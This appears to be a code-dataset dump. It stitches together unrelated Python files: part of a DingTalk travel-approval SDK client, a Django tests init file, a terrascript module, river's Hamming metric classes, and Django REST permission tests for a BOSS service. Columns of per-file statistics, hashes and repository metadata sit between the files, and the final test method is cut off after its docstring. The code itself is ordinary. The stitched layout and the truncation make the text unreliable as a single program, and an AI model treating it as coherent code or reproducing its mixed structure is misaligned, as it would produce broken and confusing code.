) -> dingtalkalitrip__1__0_models.QueryCityCarApplyResponse:
runtime = util_models.RuntimeOptions()
headers = dingtalkalitrip__1__0_models.QueryCityCarApplyHeaders()
return self.query_city_car_apply_with_options(request, headers, runtime)
async def query_city_car_apply_async(
self,
request: dingtalkalitrip__1__0_models.QueryCityCarApplyRequest,
) -> dingtalkalitrip__1__0_models.QueryCityCarApplyResponse:
runtime = util_models.RuntimeOptions()
headers = dingtalkalitrip__1__0_models.QueryCityCarApplyHeaders()
return await self.query_city_car_apply_with_options_async(request, headers, runtime)
def query_city_car_apply_with_options(
self,
request: dingtalkalitrip__1__0_models.QueryCityCarApplyRequest,
headers: dingtalkalitrip__1__0_models.QueryCityCarApplyHeaders,
runtime: util_models.RuntimeOptions,
) -> dingtalkalitrip__1__0_models.QueryCityCarApplyResponse:
UtilClient.validate_model(request)
query = {}
if not UtilClient.is_unset(request.corp_id):
query['corpId'] = request.corp_id
if not UtilClient.is_unset(request.created_end_at):
query['createdEndAt'] = request.created_end_at
if not UtilClient.is_unset(request.created_start_at):
query['createdStartAt'] = request.created_start_at
if not UtilClient.is_unset(request.page_number):
query['pageNumber'] = request.page_number
if not UtilClient.is_unset(request.page_size):
query['pageSize'] = request.page_size
if not UtilClient.is_unset(request.third_part_apply_id):
query['thirdPartApplyId'] = request.third_part_apply_id
if not UtilClient.is_unset(request.user_id):
query['userId'] = request.user_id
real_headers = {}
if not UtilClient.is_unset(headers.common_headers):
real_headers = headers.common_headers
if not UtilClient.is_unset(headers.x_acs_dingtalk_access_token):
real_headers['x-acs-dingtalk-access-token'] = headers.x_acs_dingtalk_access_token
req = open_api_models.OpenApiRequest(
headers=real_headers,
query=OpenApiUtilClient.query(query)
)
return TeaCore.from_map(
dingtalkalitrip__1__0_models.QueryCityCarApplyResponse(),
self.do_roarequest('QueryCityCarApply', 'alitrip_1.0', 'HTTP', 'GET', 'AK', f'/v1.0/alitrip/cityCarApprovals', 'json', req, runtime)
)
async def query_city_car_apply_with_options_async(
self,
request: dingtalkalitrip__1__0_models.QueryCityCarApplyRequest,
headers: dingtalkalitrip__1__0_models.QueryCityCarApplyHeaders,
runtime: util_models.RuntimeOptions,
) -> dingtalkalitrip__1__0_models.QueryCityCarApplyResponse:
UtilClient.validate_model(request)
query = {}
if not UtilClient.is_unset(request.corp_id):
query['corpId'] = request.corp_id
if not UtilClient.is_unset(request.created_end_at):
query['createdEndAt'] = request.created_end_at
if not UtilClient.is_unset(request.created_start_at):
query['createdStartAt'] = request.created_start_at
if not UtilClient.is_unset(request.page_number):
query['pageNumber'] = request.page_number
if not UtilClient.is_unset(request.page_size):
query['pageSize'] = request.page_size
if not UtilClient.is_unset(request.third_part_apply_id):
query['thirdPartApplyId'] = request.third_part_apply_id
if not UtilClient.is_unset(request.user_id):
query['userId'] = request.user_id
real_headers = {}
if not UtilClient.is_unset(headers.common_headers):
real_headers = headers.common_headers
if not UtilClient.is_unset(headers.x_acs_dingtalk_access_token):
real_headers['x-acs-dingtalk-access-token'] = headers.x_acs_dingtalk_access_token
req = open_api_models.OpenApiRequest(
headers=real_headers,
query=OpenApiUtilClient.query(query)
)
return TeaCore.from_map(
dingtalkalitrip__1__0_models.QueryCityCarApplyResponse(),
await self.do_roarequest_async('QueryCityCarApply', 'alitrip_1.0', 'HTTP', 'GET', 'AK', f'/v1.0/alitrip/cityCarApprovals', 'json', req, runtime)
)
def get_train_exceed_apply(
self,
request: dingtalkalitrip__1__0_models.GetTrainExceedApplyRequest,
) -> dingtalkalitrip__1__0_models.GetTrainExceedApplyResponse:
runtime = util_models.RuntimeOptions()
headers = dingtalkalitrip__1__0_models.GetTrainExceedApplyHeaders()
return self.get_train_exceed_apply_with_options(request, headers, runtime)
async def get_train_exceed_apply_async(
self,
request: dingtalkalitrip__1__0_models.GetTrainExceedApplyRequest,
) -> dingtalkalitrip__1__0_models.GetTrainExceedApplyResponse:
runtime = util_models.RuntimeOptions()
headers = dingtalkalitrip__1__0_models.GetTrainExceedApplyHeaders()
return await self.get_train_exceed_apply_with_options_async(request, headers, runtime)
def get_train_exceed_apply_with_options(
self,
request: dingtalkalitrip__1__0_models.GetTrainExceedApplyRequest,
headers: dingtalkalitrip__1__0_models.GetTrainExceedApplyHeaders,
runtime: util_models.RuntimeOptions,
) -> dingtalkalitrip__1__0_models.GetTrainExceedApplyResponse:
UtilClient.validate_model(request)
query = {}
if not UtilClient.is_unset(request.corp_id):
query['corpId'] = request.corp_id
if not UtilClient.is_unset(request.apply_id):
query['applyId'] = request.apply_id
real_headers = {}
if not UtilClient.is_unset(headers.common_headers):
real_headers = headers.common_headers
if not UtilClient.is_unset(headers.x_acs_dingtalk_access_token):
real_headers['x-acs-dingtalk-access-token'] = headers.x_acs_dingtalk_access_token
req = open_api_models.OpenApiRequest(
headers=real_headers,
query=OpenApiUtilClient.query(query)
)
return TeaCore.from_map(
dingtalkalitrip__1__0_models.GetTrainExceedApplyResponse(),
self.do_roarequest('GetTrainExceedApply', 'alitrip_1.0', 'HTTP', 'GET', 'AK', f'/v1.0/alitrip/exceedapply/getTrain', 'json', req, runtime)
)
async def get_train_exceed_apply_with_options_async(
self,
request: dingtalkalitrip__1__0_models.GetTrainExceedApplyRequest,
headers: dingtalkalitrip__1__0_models.GetTrainExceedApplyHeaders,
runtime: util_models.RuntimeOptions,
) -> dingtalkalitrip__1__0_models.GetTrainExceedApplyResponse:
UtilClient.validate_model(request)
query = {}
if not UtilClient.is_unset(request.corp_id):
query['corpId'] = request.corp_id
if not UtilClient.is_unset(request.apply_id):
query['applyId'] = request.apply_id
real_headers = {}
if not UtilClient.is_unset(headers.common_headers):
real_headers = headers.common_headers
if not UtilClient.is_unset(headers.x_acs_dingtalk_access_token):
real_headers['x-acs-dingtalk-access-token'] = headers.x_acs_dingtalk_access_token
req = open_api_models.OpenApiRequest(
headers=real_headers,
query=OpenApiUtilClient.query(query)
)
return TeaCore.from_map(
dingtalkalitrip__1__0_models.GetTrainExceedApplyResponse(),
await self.do_roarequest_async('GetTrainExceedApply', 'alitrip_1.0', 'HTTP', 'GET', 'AK', f'/v1.0/alitrip/exceedapply/getTrain', 'json', req, runtime)
)
| 50.653218
| 173
| 0.700284
| 5,762
| 52,730
| 6.013363
| 0.037834
| 0.028284
| 0.084851
| 0.096164
| 0.979942
| 0.966002
| 0.95515
| 0.94326
| 0.936795
| 0.916419
| 0
| 0.010546
| 0.214185
| 52,730
| 1,040
| 174
| 50.701923
| 0.825659
| 0.001517
| 0
| 0.838415
| 1
| 0
| 0.07265
| 0.02903
| 0
| 0
| 0
| 0
| 0
| 1
| 0.025407
| false
| 0
| 0.007114
| 0
| 0.082317
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
aac5c05c8c25eb97073702ef09377f3747851dc2
| 176
|
py
|
Python
|
django_server/fvh_courier/rest/tests/__init__.py
|
ForumViriumHelsinki/CityLogistics
|
df4efef49bdc740a1dc47d0bda49ce2b3833e9c1
|
[
"MIT"
] | 1
|
2021-11-02T03:21:48.000Z
|
2021-11-02T03:21:48.000Z
|
django_server/fvh_courier/rest/tests/__init__.py
|
ForumViriumHelsinki/CityLogistics
|
df4efef49bdc740a1dc47d0bda49ce2b3833e9c1
|
[
"MIT"
] | 136
|
2019-12-03T14:52:17.000Z
|
2022-02-26T21:18:15.000Z
|
django_server/fvh_courier/rest/tests/__init__.py
|
ForumViriumHelsinki/CityLogistics
|
df4efef49bdc740a1dc47d0bda49ce2b3833e9c1
|
[
"MIT"
] | 2
|
2020-06-23T23:58:08.000Z
|
2020-12-08T13:19:28.000Z
|
from .available_packages_tests import * # noqa
from .outgoing_packages_tests import * # noqa
from .reserved_packages_tests import * # noqa
from .rest_tests import * # noqa
| 35.2
| 47
| 0.772727
| 23
| 176
| 5.608696
| 0.391304
| 0.341085
| 0.465116
| 0.534884
| 0.627907
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.159091
| 176
| 4
| 48
| 44
| 0.871622
| 0.107955
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
2af380581058306eaf70e3dd92e239d2c7dfc581
| 382
|
py
|
Python
|
terrascript/data/circonus.py
|
mjuenema/python-terrascript
|
6d8bb0273a14bfeb8ff8e950fe36f97f7c6e7b1d
|
[
"BSD-2-Clause"
] | 507
|
2017-07-26T02:58:38.000Z
|
2022-01-21T12:35:13.000Z
|
terrascript/data/circonus.py
|
mjuenema/python-terrascript
|
6d8bb0273a14bfeb8ff8e950fe36f97f7c6e7b1d
|
[
"BSD-2-Clause"
] | 135
|
2017-07-20T12:01:59.000Z
|
2021-10-04T22:25:40.000Z
|
terrascript/data/circonus.py
|
mjuenema/python-terrascript
|
6d8bb0273a14bfeb8ff8e950fe36f97f7c6e7b1d
|
[
"BSD-2-Clause"
] | 81
|
2018-02-20T17:55:28.000Z
|
2022-01-31T07:08:40.000Z
|
# terrascript/data/circonus.py
# Automatically generated by tools/makecode.py (24-Sep-2021 15:13:59 UTC)
#
# For imports without namespace, e.g.
#
# >>> import terrascript.data.circonus
#
# instead of
#
# >>> import terrascript.data.circonus-labs.circonus
#
# This is only available for 'official' and 'partner' providers.
from terrascript.data.circonus_labs.circonus import *
| 25.466667
| 73
| 0.743455
| 51
| 382
| 5.54902
| 0.686275
| 0.212014
| 0.325088
| 0.204947
| 0.24735
| 0
| 0
| 0
| 0
| 0
| 0
| 0.036254
| 0.133508
| 382
| 14
| 74
| 27.285714
| 0.818731
| 0.790576
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
2d59dc46987b2971918f29c09b427d77d2e1be71
| 2,584
|
py
|
Python
|
river/metrics/hamming.py
|
mathco-wf/river
|
c6ff38fa4ce4843ede1cba77248e0370a67a36f6
|
[
"BSD-3-Clause"
] | 2,184
|
2020-11-11T12:31:12.000Z
|
2022-03-31T16:45:41.000Z
|
river/metrics/hamming.py
|
raphaelsty/river
|
2e0b25a2ef2d2ba9ec080cf86a491f7465433b18
|
[
"BSD-3-Clause"
] | 262
|
2020-11-11T17:15:47.000Z
|
2022-03-31T23:54:03.000Z
|
river/metrics/hamming.py
|
raphaelsty/river
|
2e0b25a2ef2d2ba9ec080cf86a491f7465433b18
|
[
"BSD-3-Clause"
] | 240
|
2020-11-11T14:25:03.000Z
|
2022-03-31T08:25:50.000Z
|
import numpy as np
from . import base
__all__ = ["Hamming"]
class Hamming(base.MultiOutputClassificationMetric):
"""Hamming score.
The Hamming score is the fraction of labels that are correctly predicted.
Parameters
----------
cm
This parameter allows sharing the same confusion matrix between multiple metrics. Sharing a
confusion matrix reduces the amount of storage and computation time.
Examples
--------
>>> from river import metrics
>>> y_true = [
... {0: False, 1: True, 2: True},
... {0: True, 1: True, 2: False},
... {0: True, 1: True, 2: False},
... ]
>>> y_pred = [
... {0: True, 1: True, 2: True},
... {0: True, 1: False, 2: False},
... {0: True, 1: True, 2: False},
... ]
>>> metric = metrics.Hamming()
>>> for yt, yp in zip(y_true, y_pred):
... metric = metric.update(yt, yp)
>>> metric
Hamming: 0.555556
"""
@property
def bigger_is_better(self):
return True
@property
def requires_labels(self):
return True
def get(self):
try:
return np.sum(self.cm.data[:, 1, 1]) / (
self.cm.n_samples * self.cm.n_labels
)
except ZeroDivisionError:
return 0.0
class HammingLoss(base.MultiOutputClassificationMetric):
"""Hamming loss score.
The Hamming loss is the complement of the Hamming score.
Parameters
----------
cm
This parameter allows sharing the same confusion matrix between multiple metrics. Sharing a
confusion matrix reduces the amount of storage and computation time.
Examples
--------
>>> from river import metrics
>>> y_true = [
... {0: False, 1: True, 2: True},
... {0: True, 1: True, 2: False},
... {0: True, 1: True, 2: False},
... ]
>>> y_pred = [
... {0: True, 1: True, 2: True},
... {0: True, 1: False, 2: False},
... {0: True, 1: True, 2: False},
... ]
>>> metric = metrics.HammingLoss()
>>> for yt, yp in zip(y_true, y_pred):
... metric = metric.update(yt, yp)
>>> metric
HammingLoss: 0.444444
"""
@property
def bigger_is_better(self):
return True
@property
def requires_labels(self):
return True
def get(self):
try:
return 1.0 - np.sum(self.cm.data[:, 1, 1]) / (
self.cm.n_samples * self.cm.n_labels
)
except ZeroDivisionError:
return 0.0
| 22.275862
| 99
| 0.535604
| 308
| 2,584
| 4.422078
| 0.243506
| 0.036711
| 0.044053
| 0.058737
| 0.762115
| 0.762115
| 0.762115
| 0.762115
| 0.762115
| 0.762115
| 0
| 0.034286
| 0.322755
| 2,584
| 115
| 100
| 22.469565
| 0.744
| 0.576238
| 0
| 0.709677
| 0
| 0
| 0.007955
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.193548
| false
| 0
| 0.064516
| 0.129032
| 0.580645
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 8
|
2d7bcbf53bd132114eaf2d5be9e2efbe5a2a41de
| 25,348
|
py
|
Python
|
django/bosscore/test/test_permission_views.py
|
ArnaudGallardo/boss
|
c0d3bbca31575ac5442822b8d7f962def32d9072
|
[
"Apache-2.0"
] | 20
|
2016-05-16T21:08:13.000Z
|
2021-11-16T11:50:19.000Z
|
django/bosscore/test/test_permission_views.py
|
ArnaudGallardo/boss
|
c0d3bbca31575ac5442822b8d7f962def32d9072
|
[
"Apache-2.0"
] | 31
|
2016-10-28T17:51:11.000Z
|
2022-02-10T08:07:31.000Z
|
django/bosscore/test/test_permission_views.py
|
ArnaudGallardo/boss
|
c0d3bbca31575ac5442822b8d7f962def32d9072
|
[
"Apache-2.0"
] | 12
|
2016-10-28T17:47:01.000Z
|
2021-05-18T23:47:06.000Z
|
# Copyright 2016 The Johns Hopkins University Applied Physics Laboratory
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from rest_framework.test import APITestCase
from django.conf import settings
from .setup_db import SetupTestDB
from ..constants import PUBLIC_GRP
import json
version = settings.BOSS_VERSION
class PermissionViewsCollectionTests(APITestCase):
"""
Class to test the permission service which assigns permissions to collections
"""
def setUp(self):
"""
Initialize the database
:return:
"""
dbsetup = SetupTestDB()
user = dbsetup.create_user('testuser')
dbsetup.add_role('resource-manager')
dbsetup.set_user(user)
self.client.force_login(user)
dbsetup.create_group('test')
dbsetup.insert_test_data()
def test_get_permission(self):
"""
Post permissions for a valid group and collection
"""
url = '/' + version + '/permissions/'
response = self.client.get(url)
self.assertEqual(response.status_code, 200)
def test_get_permission_empty(self):
"""
Post permissions for a valid group and collection
"""
url = '/' + version + '/permissions/?group=test'
response = self.client.get(url)
self.assertEqual(response.status_code, 200)
self.assertEqual(response.data['permission-sets'], [])
def test_post_permission_collection(self):
"""
Post permissions for a valid group and collection
"""
url = '/' + version + '/permissions/'
data = {
'group': 'test',
'collection': 'col1',
'permissions': ['read', 'add', 'update']
}
response = self.client.post(url, data=data)
self.assertEqual(response.status_code, 201)
def test_post_invalid_permissions_collection(self):
"""
Post invalid permissions strings
"""
url = '/' + version + '/permissions/'
data = {
'group': 'test',
'collection': 'col1',
'permissions': ['readeeee', 'add', 'update']
}
response = self.client.post(url, data=data)
self.assertEqual(response.status_code, 400)
def test_post_permissions_invalid(self):
"""
Post permissions to a resource or group that does not exist
"""
# Resource does not exist
url = '/' + version + '/permissions/'
data = {
'group': 'test',
'collection': 'col1eee',
'permissions': ['read', 'add', 'update']
}
response = self.client.post(url, data=data)
self.assertEqual(response.status_code, 404)
# group does not exist
url = '/' + version + '/permissions/'
data = {
'group': 'testeee',
'collection': 'col1',
'permissions': ['read', 'add', 'update']
}
response = self.client.post(url, data=data)
self.assertEqual(response.status_code, 404)
def test_get_permission_for_collection_filter_group(self):
"""
Get permissions for a collection
"""
url = '/' + version + '/permissions/'
data = {
'group': 'test',
'collection': 'col1',
'permissions': ['read', 'add', 'update']
}
response = self.client.post(url, data=data)
self.assertEqual(response.status_code, 201)
url = '/' + version + '/permissions/?group=test'
response = self.client.get(url)
self.assertEqual(response.status_code, 200)
def test_get_permission_for_collection_filter_collection(self):
"""
Get permissions for a collection
"""
url = '/' + version + '/permissions/'
data = {
'group': 'test',
'collection': 'col1',
'permissions': ['read', 'add', 'update']
}
response = self.client.post(url, data=data)
self.assertEqual(response.status_code, 201)
url = '/' + version + '/permissions/?collection=col1'
response = self.client.get(url)
self.assertEqual(response.status_code, 200)
def test_get_permission_for_collection_filter_collection_group(self):
"""
Get permissions for a collection
"""
url = '/' + version + '/permissions/'
data = {
'group': 'test',
'collection': 'col1',
'permissions': ['read', 'add', 'update']
}
response = self.client.post(url, data=data)
self.assertEqual(response.status_code, 201)
url = '/' + version + '/permissions/?group=test&collection=col1'
response = self.client.get(url)
self.assertEqual(response.status_code, 200)
def test_get_permission_invalid(self):
"""
Get permissions for a resource that does not exist or a group that does not exist
"""
# group does not exist
url = '/' + version + '/permissions/?group=testeee'
response = self.client.get(url)
self.assertEqual(response.status_code, 404)
# resource does not exist
url = '/' + version + '/permissions/test/?collection=col1ee'
response = self.client.get(url)
self.assertEqual(response.status_code, 404)
def test_delete_permission_for_collection(self):
"""
Delete a subset of permissions for a collection
"""
url = '/' + version + '/permissions/'
data = {
'group': 'test',
'collection': 'col1',
'permissions': ['read', 'add', 'update']
}
response = self.client.post(url, data=data)
self.assertEqual(response.status_code, 201)
url = '/' + version + '/permissions/?group=test&collection=col1'
response = self.client.delete(url, None)
self.assertEqual(response.status_code, 204)
def test_patch_permission_for_collection(self):
"""
Delete a subset of permissions for a collection
"""
url = '/' + version + '/permissions/'
data = {
'group': 'test',
'collection': 'col1',
'permissions': ['read', 'add', 'update']
}
response = self.client.post(url, data=data)
self.assertEqual(response.status_code, 201)
url = '/' + version + '/permissions/?group=test&collection=col1'
response = self.client.get(url)
resp = json.loads(response.content.decode('utf-8'))
self.assertEqual(set(resp["permission-sets"][0]["permissions"]), set(['read', 'add', 'update']))
self.assertEqual(response.status_code, 200)
url = '/' + version + '/permissions/test/col1'
data = {
'group': 'test',
'collection': 'col1',
'permissions': ['read']
}
response = self.client.patch(url, data=data)
self.assertEqual(response.status_code, 200)
url = '/' + version + '/permissions/?group=test&collection=col1'
response = self.client.get(url)
resp = json.loads(response.content.decode('utf-8'))
self.assertEqual(set(resp["permission-sets"][0]["permissions"]),set(['read']))
self.assertEqual(response.status_code, 200)
class PermissionViewsExperimentTests(APITestCase):
"""
Class to test the permission service which assigns permissions to experiments
"""
def setUp(self):
"""
Initialize the database
:return:
"""
dbsetup = SetupTestDB()
self.user1 = dbsetup.create_user('testuser2555')
dbsetup.set_user(self.user1)
dbsetup.create_group('unittest2555')
self.user2 = dbsetup.create_user('testuser')
dbsetup.add_role('resource-manager')
dbsetup.set_user(self.user2)
self.client.force_login(self.user2)
dbsetup.create_group('test')
dbsetup.insert_test_data()
def test_post_permission_experiment(self):
"""
Post permissions for a valid group and experiment
"""
url = '/' + version + '/permissions/'
data = {
'group': 'test',
'collection': 'col1',
'experiment': 'exp1',
'permissions': ['read', 'add', 'update']
}
response = self.client.post(url, data=data)
self.assertEqual(response.status_code, 201)
def test_post_invalid_permissions_experiment(self):
"""
Post invalid permissions strings
"""
url = '/' + version + '/permissions/'
data = {
'group': 'test',
'collection': 'col1',
'experiment': 'exp1',
'permissions': ['readeeee', 'add', 'update']
}
response = self.client.post(url, data=data)
self.assertEqual(response.status_code, 400)
def test_post_permissions_invalid(self):
"""
Post permissions to a resource or group that does not exist
"""
# Resource does not exist
url = '/' + version + '/permissions/'
data = {
'group': 'test',
'collection': 'col1eee',
'experiment': 'exp1',
'permissions': ['read', 'add', 'update']
}
response = self.client.post(url, data=data)
self.assertEqual(response.status_code, 404)
# group does not exist
url = '/' + version + '/permissions/'
data = {
'group': 'testeee',
'collection': 'col1',
'experiment': 'exp1',
'permissions': ['read', 'add', 'update']
}
response = self.client.post(url, data=data)
self.assertEqual(response.status_code, 404)
def test_get_permission_for_collection_filter_group(self):
"""
Get permissions for a collection
"""
url = '/' + version + '/permissions/'
data = {
'group': 'test',
'collection': 'col1',
'experiment': 'exp1',
'permissions': ['read', 'add', 'update']
}
response = self.client.post(url, data=data)
self.assertEqual(response.status_code, 201)
url = '/' + version + '/permissions/?group=test'
response = self.client.get(url)
self.assertEqual(response.status_code, 200)
def test_get_permission_for_experiment_filter_experiment(self):
"""
Get permissions for a experiment
"""
url = '/' + version + '/permissions/'
data = {
'group': 'test',
'collection': 'col1',
'experiment': 'exp1',
'permissions': ['read', 'add', 'update']
}
response = self.client.post(url, data=data)
self.assertEqual(response.status_code, 201)
url = '/' + version + '/permissions/?collection=col1&experiment=exp1'
response = self.client.get(url)
self.assertEqual(response.status_code, 200)
def test_get_permission_invalid(self):
"""
Get permissions for a resource that does not exist or a group that does not exist
"""
# group does not exist
url = '/' + version + '/permissions/?group=testeee'
response = self.client.get(url)
self.assertEqual(response.status_code, 404)
# resource does not exist
url = '/' + version + '/permissions/test/?collection=col1&experiment=exp1eeeee'
response = self.client.get(url)
self.assertEqual(response.status_code, 404)
def test_delete_permission_for_experiment(self):
"""
Delete a subset of permissions for a experiment
"""
url = '/' + version + '/permissions/'
data = {
'group': 'test',
'collection': 'col1',
'experiment': 'exp1',
'permissions': ['read', 'add', 'update']
}
response = self.client.post(url, data=data)
self.assertEqual(response.status_code, 201)
url = '/' + version + '/permissions/?group=test&collection=col1&experiment=exp1'
response = self.client.delete(url, None)
self.assertEqual(response.status_code, 204)
def test_delete_permission_for_experiment_invalid_group(self):
"""
Delete a subset of permissions for a experiment
"""
url = '/' + version + '/permissions/?group=testeeee&collection=col1&experiment=exp1'
response = self.client.delete(url, None)
self.assertEqual(response.status_code, 404)
def test_delete_permission_for_experiment_missing_group(self):
"""
Delete a subset of permissions for a experiment
"""
url = '/' + version + '/permissions/?collection=col1&experiment=exp1'
response = self.client.delete(url, None)
self.assertEqual(response.status_code, 400)
def test_delete_permission_for_experiment_missing_resource(self):
"""
Delete a subset of permissions for a experiment
"""
url = '/' + version + '/permissions/?group=test'
response = self.client.delete(url, None)
self.assertEqual(response.status_code, 400)
def test_patch_permission_for_experiment(self):
"""
Delete a subset of permissions for a experiment
"""
url = '/' + version + '/permissions/'
data = {
'group': 'test',
'collection': 'col1',
'experiment': 'exp1',
'permissions': ['read', 'add', 'update']
}
response = self.client.post(url, data=data)
self.assertEqual(response.status_code, 201)
url = '/' + version + '/permissions/?group=test&collection=col1&experiment=exp1'
response = self.client.get(url)
resp = json.loads(response.content.decode('utf-8'))
self.assertEqual(set(resp["permission-sets"][0]["permissions"]), set(['read', 'add', 'update']))
self.assertEqual(response.status_code, 200)
url = '/' + version + '/permissions/'
data = {
'group': 'test',
'collection': 'col1',
'experiment': 'exp1',
'permissions': ['read']
}
response = self.client.patch(url, data=data)
self.assertEqual(response.status_code, 200)
url = '/' + version + '/permissions/?group=test&collection=col1&experiment=exp1'
response = self.client.get(url)
resp = json.loads(response.content.decode('utf-8'))
self.assertEqual(set(resp["permission-sets"][0]["permissions"]), set(['read']))
self.assertEqual(response.status_code, 200)
class PermissionViewsChannelTests(APITestCase):
"""
Class to test the permission service which assigns permissions to channels
"""
def setUp(self):
"""
Initialize the database
:return:
"""
dbsetup = SetupTestDB()
self.user1 = dbsetup.create_user('testuser2555')
dbsetup.add_role('resource-manager')
dbsetup.set_user(self.user1)
dbsetup.create_group('unittest2555')
self.user2 = dbsetup.create_user('testuser')
dbsetup.add_role('resource-manager')
dbsetup.set_user(self.user2)
self.client.force_login(self.user2)
dbsetup.create_group('test')
dbsetup.insert_test_data()
def test_post_permission_channel(self):
"""
Post permissions for a valid group and channel
"""
url = '/' + version + '/permissions/'
data = {
'group': 'test',
'collection': 'col1',
'experiment': 'exp1',
'channel': 'channel1',
'permissions': ['read', 'add', 'update']
}
response = self.client.post(url, data=data)
self.assertEqual(response.status_code, 201)
def test_post_invalid_permissions_channel(self):
"""
Post invalid permissions strings
"""
url = '/' + version + '/permissions/'
data = {
'group': 'test',
'collection': 'col1',
'experiment': 'exp1',
'channel': 'channel1',
'permissions': ['readeeee', 'add', 'update']
}
response = self.client.post(url, data=data)
self.assertEqual(response.status_code, 400)
def test_post_permissions_invalid(self):
"""
Post permissions to a resource or group that does not exist
"""
# Resource does not exist
url = '/' + version + '/permissions/'
data = {
'group': 'test',
'collection': 'col1eee',
'experiment': 'exp1',
'channel': 'channel1',
'permissions': ['read', 'add', 'update']
}
response = self.client.post(url, data=data)
self.assertEqual(response.status_code, 404)
# group does not exist
url = '/' + version + '/permissions/'
data = {
'group': 'testeee',
'collection': 'col1',
'experiment': 'exp1',
'channel': 'channel1',
'permissions': ['read', 'add', 'update']
}
response = self.client.post(url, data=data)
self.assertEqual(response.status_code, 404)
def test_get_permission_for_channel_filter_group(self):
"""
Get permissions for a channel
"""
url = '/' + version + '/permissions/'
data = {
'group': 'test',
'collection': 'col1',
'experiment': 'exp1',
'channel': 'channel1',
'permissions': ['read', 'add', 'update']
}
response = self.client.post(url, data=data)
self.assertEqual(response.status_code, 201)
url = '/' + version + '/permissions/?group=test'
response = self.client.get(url)
self.assertEqual(response.status_code, 200)
def test_get_permission_for_channel_filter_channel(self):
"""
Get permissions for a channel
"""
url = '/' + version + '/permissions/'
data = {
'group': 'test',
'collection': 'col1',
'experiment': 'exp1',
'channel': 'channel1',
'permissions': ['read', 'add', 'update']
}
response = self.client.post(url, data=data)
self.assertEqual(response.status_code, 201)
url = '/' + version + '/permissions/?collection=col1&experiment=exp1&channel=channel1'
response = self.client.get(url)
self.assertEqual(response.status_code, 200)
def test_get_permission_invalid(self):
"""
Get permissions for a resource that does not exist or a group that does not exist
"""
# group does not exist
url = '/' + version + '/permissions/?group=testeee'
response = self.client.get(url)
self.assertEqual(response.status_code, 404)
# resource does not exist
url = '/' + version + '/permissions/test/?collection=col1&experiment=exp1eeeee&channel=exp1'
response = self.client.get(url)
self.assertEqual(response.status_code, 404)
def test_delete_permission_for_channel(self):
"""
Delete a subset of permissions for a channel
"""
url = '/' + version + '/permissions/'
data = {
'group': 'test',
'collection': 'col1',
'experiment': 'exp1',
'channel': 'channel1',
'permissions': ['read', 'add', 'update']
}
response = self.client.post(url, data=data)
self.assertEqual(response.status_code, 201)
url = '/' + version + '/permissions/?group=test&collection=col1&experiment=exp1&channel=channel1'
response = self.client.delete(url, None)
self.assertEqual(response.status_code, 204)
def test_patch_permission_for_channel(self):
"""
Delete a subset of permissions for a channel
"""
url = '/' + version + '/permissions/'
data = {
'group': 'test',
'collection': 'col1',
'experiment': 'exp1',
'channel': 'channel1',
'permissions': ['read', 'add', 'update']
}
response = self.client.post(url, data=data)
self.assertEqual(response.status_code, 201)
url = '/' + version + '/permissions/?group=test&collection=col1&experiment=exp1&channel=channel1'
response = self.client.get(url)
resp = json.loads(response.content.decode('utf-8'))
self.assertEqual(set(resp["permission-sets"][0]["permissions"]), set(['read', 'add', 'update']))
self.assertEqual(response.status_code, 200)
url = '/' + version + '/permissions/'
data = {
'group': 'test',
'collection': 'col1',
'experiment': 'exp1',
'channel': 'channel1',
'permissions': ['read']
}
response = self.client.patch(url, data=data)
self.assertEqual(response.status_code, 200)
url = '/' + version + '/permissions/?group=test&collection=col1&experiment=exp1&channel=channel1'
response = self.client.get(url)
resp = json.loads(response.content.decode('utf-8'))
self.assertEqual(set(resp["permission-sets"][0]["permissions"]), set(['read']))
self.assertEqual(response.status_code, 200)
def test_post_permissions_for_channel_not_member_maintainer(self):
"""
Post invalid permissions strings
"""
self.client.force_login(self.user1)
url = '/' + version + '/permissions/'
data = {
'group': 'test',
'collection': 'col1',
'experiment': 'exp1',
'permissions': ['read', 'add', 'update']
}
response = self.client.post(url, data=data)
self.assertEqual(response.status_code, 403)
def test_patch_permission_for_channel_not_member_maintainer(self):
"""
Test patch permission if user is not a member or maintainer
"""
self.client.force_login(self.user1)
# patch permission on a group that the user is not a member or maintainer of.
url = '/' + version + '/permissions/'
data = {
'group': 'test',
'collection': 'col1',
'experiment': 'exp1',
'channel': 'channel1',
'permissions': ['read']
}
response = self.client.patch(url, data=data)
self.assertEqual(response.status_code, 403)
def test_delete_permission_for_channel_not_member_maintainer(self):
"""
Delete a subset of permissions for a channel
"""
